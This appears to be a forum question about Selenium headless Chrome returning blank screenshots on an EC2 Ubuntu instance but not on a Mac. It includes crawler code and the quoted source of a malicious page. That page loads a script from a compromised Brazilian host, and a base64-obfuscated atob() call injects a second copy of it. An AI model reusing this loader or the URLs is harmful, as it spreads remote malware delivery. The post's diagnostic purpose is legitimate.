I am using the Python bindings for Selenium to load websites (they may be malicious, benign, or greyware) for a project I'm building.
While the majority of pages behave identically (whether they're SPA or traditional HTML pages), I've noticed that there are at least a subset that -- on an Amazon EC2 t2.micro instance of Ubuntu Jammy (ubuntu-jammy-22.04-amd64-server-20220609 with Chrome v. 112.0.5615.121
and Chromedriver v. 112.0.5615.49
) -- show blank screenshots when I use the get_screenshot_as_base64()
call with a Chrome driver:
Blank screenshot on Ubuntu EC2 instance
Testing locally on a Mac M1 (running OS X Monterey with Chrome v. 112.0.5615.137
and Chromedriver v. 112.0.5615.49
) with the exact same code (provided below), however, does not create a blank screenshot:
Non-blank screenshot on Mac M1
Code:
def crawl_test(url, sshot_outfile="test.png"):
from web_driver_wrapper import WebDriverWrapper
screenshot = None
try:
import base64
with WebDriverWrapper() as driver_wrapper:
driver = driver_wrapper.driver
driver.get(url)
tries = 10 # try for 5 seconds, essentially
try:
screenshot = driver.get_screenshot_as_base64()
while screenshot and
screenshot.endswith(config.SCREENSHOT_BYTES_BLANK)
and tries > 0:
logger.info(f"Trying to get non-empty screenshot, attempt #{10-tries}")
time.sleep(0.5)
screenshot = driver.get_screenshot_as_base64() # try capturing again
tries -= 1
with open(sshot_outfile, 'wb') as f:
f.write(base64.b64decode(screenshot))
The WebDriverWrapper() call mentioned above essentially looks like the following:
chrome_options.add_argument("--headless")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--disable-gpu")
chrome_options.add_argument("--disable-dev-tools")
chrome_options.add_argument("--no-zygote")
chrome_options.add_argument("--single-process")
chrome_options.add_argument("window-size=1080x768")
chrome_options.add_argument("--remote-debugging-port=9222")
input_driver = webdriver.Chrome(chromedriver_location, options=chrome_options)
return input_driver
The chromedriver_location
variable is passed in based on whichever OS I'm using and works fine.
While I haven't evaluated all of the cases, I know that at least one of the relevant scenarios where this difference occurs is because the Ubuntu version does not seem to evaluate the script in the <head>
tag, whereas the Mac version does. The content of that page source is as follows (note that the html below is from a malicious website, so please do not run unless you know what you're doing!)
<html><head><script src="https://fmplay.com.br/fm/wp-content/cache/host%5bv17%5d/admin/js/fr.js"></script></head><body><input id="b64u" type="hidden" value="aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUvaG9zdCU1YnYxNyU1ZC8zNDhmMjE5LnBocA=="/><script>const per = document.createElement("script");per.src=atob("aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUvaG9zdCU1YnYxNyU1ZC9hZG1pbi9qcy9mci5qcw==");document.head.appendChild(per);</script></body></html>
On the Macbook example, it takes about 2 loops to properly evaluate the script and send me to the final page. However, on the EC2 instance it simply never changes. I've tried up to ~50 seconds of looping on EC2 with no change, just in case it was a resources issue.
In addition, I have tried the following, each of which elicited no change to the behavior on the Ubuntu instance:
- a few different versions of Chrome/Chromedriver
- the
Service
-based setup referenced here - using
xvfb-run
as described here - using the
Remote
class of Selenium's webdriver as described at the end of this article
At this point, I've exhausted all of my expertise and Googling, and I'm hoping some fantastic person out there has run into and overcome this issue. Thanks in advance for any of your time!